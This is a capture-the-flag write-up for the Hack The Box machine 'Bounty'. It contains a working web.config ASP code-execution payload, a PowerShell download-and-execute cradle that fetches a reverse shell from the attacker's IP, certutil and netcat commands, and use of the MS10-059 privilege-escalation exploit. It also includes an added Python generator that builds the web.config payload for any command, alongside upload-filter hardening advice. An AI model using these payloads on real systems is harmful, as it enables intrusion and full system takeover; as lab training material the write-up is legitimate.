HTB - Bounty

Bounty

Getting Root

  1. The box only had port 80 open, running an application that allows file uploads while blocking asp, aspx and a few other file extensions.

  2. I was able to bypass the upload filter using a null byte (%00.jpg), but the application generated an error giving a clue about something related to web.config.

  3. After some research about web.config, I was able to find an article describing how to upload a web.config file with ASP code embedded, and I was able to get a shell.

  4. For privilege escalation, I was able to get SYSTEM using MS10-059.

Tools used:

nmap, nikto, gobuster, nishang, windows-exploit-suggester.py

Nmap

# Nmap 7.80 scan initiated Sun Mar  8 22:08:29 2020 as: nmap -Pn -sC -sV -p 80 -oN nmap/Bounty_nmap.txt 10.10.10.93  
Nmap scan report for 10.10.10.93
Host is up (0.040s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar  8 22:08:50 2020 -- 1 IP address (1 host up) scanned in 21.20 seconds
# Nmap 7.80 scan initiated Sun Mar  8 22:08:50 2020 as: nmap -Pn -sU -oN nmap/Bounty.udp 10.10.10.93
Nmap scan report for 10.10.10.93
Host is up.
All 1000 scanned ports on 10.10.10.93 are open|filtered

# Nmap done at Sun Mar  8 22:12:12 2020 -- 1 IP address (1 host up) scanned in 201.34 seconds

Enumerating HTTP

Port 80 just shows a picture. I saved the picture as merling.jpg and used strings, steghide and exiftool but didn't find anything.

Nikto

Nothing much was found with Nikto.

nikto -host http://10.10.10.93
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.93
+ Target Hostname:    10.10.10.93
+ Target Port:        80
+ Start Time:         2020-03-08 22:18:44 (GMT-4)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/7.5
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type  
+ Retrieved x-aspnet-version header: 2.0.50727
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 
+ 7863 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2020-03-08 22:24:28 (GMT-4) (344 seconds)
---------------------------------------------------------------------------

Gobuster

gobuster dir -u http://10.10.10.93 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster/Bounty_gobuster.txt -t 40 -x asp,aspx,html,txt   
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.93
[+] Threads:        40
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     asp,aspx,html,txt
[+] Timeout:        10s
===============================================================
2020/03/08 22:24:47 Starting gobuster
===============================================================
/transfer.aspx (Status: 200)
/UploadedFiles (Status: 301)
/uploadedFiles (Status: 301)
/uploadedfiles (Status: 301)
===============================================================
2020/03/08 22:44:08 Finished
===============================================================

Testing transfer.aspx

I tried uploading files with ASP and ASPX extensions and it failed, but uploading the merling.jpg file worked. Based on that, I used Burp Proxy to intercept the request and appended a null byte (%00) to the filename to attempt to bypass the upload filter.
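The source of transfer.aspx is not shown here, so the following is an added example rather than the box's own code: an assumed reconstruction of the kind of extension blacklist that a null byte or a web.config upload slips past, set beside an allowlist check that rejects both. The blacklist contents, filenames and file bodies are constructed for illustration.

```python
"""Upload-filter models (added example; transfer.aspx's real source is not on this page).
A blacklist that only inspects the text after the final dot is compared with an
allowlist that also rejects control characters, extra dots and mismatched content."""
from urllib.parse import unquote

# Extensions the weak filter refuses (assumed; the page only says asp, aspx "and a few other")
BLACKLIST = {".asp", ".aspx", ".ashx", ".asmx", ".soap", ".exe"}

# What the hardened filter accepts, keyed to the magic bytes the body must start with
ALLOWED_MAGIC = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",
}


def last_extension(name: str) -> str:
    """Everything after the final dot, lower-cased ('' when there is no dot)."""
    dot = name.rfind(".")
    return name[dot:].lower() if dot != -1 else ""


def blacklist_allows(name: str) -> bool:
    """Weak check: only the final extension is compared to a deny-list.
    'shell.aspx<NUL>.jpg' and 'web.config' both end in something not on the list."""
    return last_extension(name) not in BLACKLIST


def allowlist_allows(name: str, data: bytes) -> bool:
    """Hardened check: no control characters or path separators, exactly one
    extension, that extension on the allow-list, and content that matches it."""
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in name):   # NUL and other controls
        return False
    if "/" in name or "\\" in name or name.startswith("."):
        return False
    stem, dot, ext = name.rpartition(".")
    if not dot or not stem or "." in stem:                     # 'a.aspx.jpg', 'web.config.jpg'
        return False
    magic = ALLOWED_MAGIC.get("." + ext.lower())
    if magic is None:
        return False
    return data.startswith(magic)


# Constructed test cases: (filename as the server receives it, first bytes of the body)
JPEG_BODY = b"\xff\xd8\xff\xe0\x00\x10JFIF"
ASP_BODY = b'<% Response.Write("hi") %>'
CASES = {
    "merling.jpg": ("merling.jpg", JPEG_BODY),
    "shell.aspx": ("shell.aspx", ASP_BODY),
    # the Burp trick from the page, after URL-decoding: a real NUL byte before '.jpg'
    "shell.aspx%00.jpg": (unquote("shell.aspx%00.jpg"), ASP_BODY),
    "shell.aspx.jpg": ("shell.aspx.jpg", ASP_BODY),
    "web.config": ("web.config", b'<?xml version="1.0"?>'),
    "shell.jpg (ASP inside)": ("shell.jpg", ASP_BODY),
}


def evaluate(cases=CASES) -> dict:
    """Return {label: (blacklist_verdict, allowlist_verdict)} for every case."""
    return {label: (blacklist_allows(name), allowlist_allows(name, body))
            for label, (name, body) in cases.items()}


if __name__ == "__main__":
    for label, (weak, strong) in evaluate().items():
        verdict = lambda ok: "pass " if ok else "BLOCK"
        print(f"{label:26} blacklist={verdict(weak)}  allowlist={verdict(strong)}")
```

Whether a NUL in the name is actually truncated on disk depends on the path API that finally writes the file (C runtime calls stop at the NUL, .NET path APIs usually reject it), which is exactly why an upload handler should refuse control characters before the name gets anywhere near the filesystem.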

Bypassing the upload filter using null byte %00

When I tried to execute the uploaded file at http://10.10.10.93/UploadedFiles/shellie.aspx, I got the following error.

I had no idea what to do from here, so I googled "IIS 7.5 web.config exploit" and, to my surprise, found the following link stating that we can actually upload a *.config file with ASP code in it and it would work.

Explanation of web.config as quoted from the link above:

Web.config

What is a web.config file?

A web.config file lets you customize the way your site or a specific directory on your site behaves. For example, if you place a web.config file in your root directory, it will affect your entire site. If you place it in a /content directory, it will only affect that directory.

With a web.config file, you can control:

Database connection strings.
Error behavior.
Security.

web.config files are XML documents. ‘.config’ is not an extension like ‘.html’ or ‘.txt’.

Getting a Reverse Shell

The link I found on Google refers to the following link for the code they used in order to get RCE.

I used the example code I found but with a few modifications:

# cat web.config 
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
   <appSettings>
</appSettings>
</configuration>
<!--
<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("ping 10.10.14.3")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>
-->
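Two properties make this payload work, and they are worth checking before uploading. The ASP code sits inside an XML comment after the root element, so the .NET configuration reader still parses the file as a valid web.config, while asp.dll (mapped to *.config by the handler line) executes the `<% %>` block. An XML comment may not contain `--`, which is why the original writes `-->` as `"-"&"->"`. The generator below is an added example, not the author's or the cited article's code; it builds the same file for an arbitrary command (the reverse-shell variant further down the page is just a different command) and verifies those properties. Command strings are constructed.

```python
"""Added example: generate the web.config RCE payload shown on this page for a
given command and check that it is still well-formed XML with no '--' inside
the trailing comment, plus that the handler mapping and request-filtering
removals the trick relies on are present."""
import xml.etree.ElementTree as ET

HANDLER = ('<add name="web_config" path="*.config" verb="*" modules="IsapiModule" '
           'scriptProcessor="%windir%\\system32\\inetsrv\\asp.dll" '
           'resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />')

TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         {handler}
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
   <appSettings>
</appSettings>
</configuration>
<!--
<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("{command}")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>
-->
"""


def vbscript_quote(command: str) -> str:
    """A literal double quote inside a VBScript string literal is written as two quotes."""
    return command.replace('"', '""')


def build_web_config(command: str) -> str:
    """Return the web.config text that runs `command` through WScript.Shell when fetched."""
    return TEMPLATE.format(handler=HANDLER, command=vbscript_quote(command))


def comment_body(payload: str) -> str:
    """Text between the trailing '<!--' and its closing '-->'."""
    start = payload.index("<!--") + 4
    end = payload.index("-->", start)
    return payload[start:end]


def check_payload(payload: str) -> dict:
    """Pre-upload checks. If the XML is malformed IIS serves a 500 for the whole
    directory, which is the failure mode a stray '--' in the command would cause."""
    body = comment_body(payload)
    result = {
        "well_formed": False,
        "no_double_dash_in_comment": "--" not in body,
        "handler_maps_config": False,
        "config_ext_unblocked": False,
        "web_config_unhidden": False,
    }
    try:
        root = ET.fromstring(payload.encode("utf-8"))
    except ET.ParseError:
        return result
    result["well_formed"] = root.tag == "configuration"
    result["handler_maps_config"] = any(
        a.get("path") == "*.config" and a.get("modules") == "IsapiModule"
        for a in root.iter("add"))
    result["config_ext_unblocked"] = any(
        r.get("fileExtension") == ".config" for r in root.iter("remove"))
    result["web_config_unhidden"] = any(
        r.get("segment") == "web.config" for r in root.iter("remove"))
    return result


if __name__ == "__main__":
    cfg = build_web_config("ping 10.10.14.3")
    print(cfg)
    print(check_payload(cfg))
```

From the defender's side, the precondition is that uploads land under the content tree where IIS honours per-directory web.config files. Setting allowSubDirConfig="false" on the virtual directory in applicationHost.config stops IIS from reading web.config below that point, and keeping the upload store outside the web root removes the problem entirely.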

Uploading the web.config file

I can also confirm it using tcpdump:

# tcpdump -nni tun0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
23:58:28.277292 IP 10.10.10.93 > 10.10.14.3: ICMP echo request, id 1, seq 1, length 40  
23:58:28.277378 IP 10.10.14.3 > 10.10.10.93: ICMP echo reply, id 1, seq 1, length 40
23:58:29.271690 IP 10.10.10.93 > 10.10.14.3: ICMP echo request, id 1, seq 2, length 40
23:58:29.271752 IP 10.10.14.3 > 10.10.10.93: ICMP echo reply, id 1, seq 2, length 40
23:58:30.270135 IP 10.10.10.93 > 10.10.14.3: ICMP echo request, id 1, seq 3, length 40
23:58:30.270165 IP 10.10.14.3 > 10.10.10.93: ICMP echo reply, id 1, seq 3, length 40
23:58:31.268337 IP 10.10.10.93 > 10.10.14.3: ICMP echo request, id 1, seq 4, length 40
23:58:31.268366 IP 10.10.14.3 > 10.10.10.93: ICMP echo reply, id 1, seq 4, length 40
^C
8 packets captured
8 packets received by filter
0 packets dropped by kernel

I used the nishang reverse PowerShell script and modified the web.config code as follows:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />  
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
   <appSettings>
</appSettings>
</configuration>
<!--
<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("cmd.exe /c powershell.exe -c iex(New-Object Net.WebClient).DownloadString('http://10.10.14.3/pwsh.ps1')")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>
-->

  1. Uploaded the new web.config file

  2. Executed it via http://10.10.10.93/UploadedFiles/web.config

  3. Started the listener on port 8008 (I edited the port in the nishang reverse TCP script)

  4. Got a shell as merlin

Started a Python HTTP server

# To serve the nishang reverse PowerShell script
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.93 - - [09/Mar/2020 00:21:47] "GET /pwsh.ps1 HTTP/1.1" 200 -

# Listener to catch the shell
# rlwrap nc -lnvp 8008
listening on [any] 8008 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.93] 49158
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>whoami
bounty\merlin
PS C:\users\merlin\desktop> systeminfo

Host Name:                 BOUNTY
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                55041-402-3606965-84760
Original Install Date:     5/30/2018, 12:22:24 AM
System Boot Time:          3/9/2020, 5:22:56 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,586 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 3,594 MB
Virtual Memory: In Use:    501 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.93

Privilege Escalation

I used windows-exploit-suggester.py against the systeminfo output:

./windows-exploit-suggester.py -d 2020-03-06-mssb.xls -i sysinfo_bounty 
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*] 
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*] 
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical

I used MS10-059. A Google search for "MS10-059 github" takes you to the following link, which provides a compiled executable (Chimichurri).

Download the executable to the target using certutil:

PS C:\users\merlin\documents> certutil -urlcache -f -split http://10.10.14.3/MS10-059.exe   

Executing the exploit

PS C:\users\merlin\documents> .\MS10-059.exe
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->
Usage: Chimichurri.exe ipaddress port <BR>    

Started a Listener

rlwrap nc -lnvp 9002
listening on [any] 9002 ...

Got Reverse Shell as SYSTEM

# On the target box
PS C:\users\merlin\documents> .\MS10-059.exe 10.10.14.3 9002


# On my Kali box
rlwrap nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.93] 49181
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\users\merlin\documents>whoami
whoami
nt authority\system

C:\users\merlin\documents>
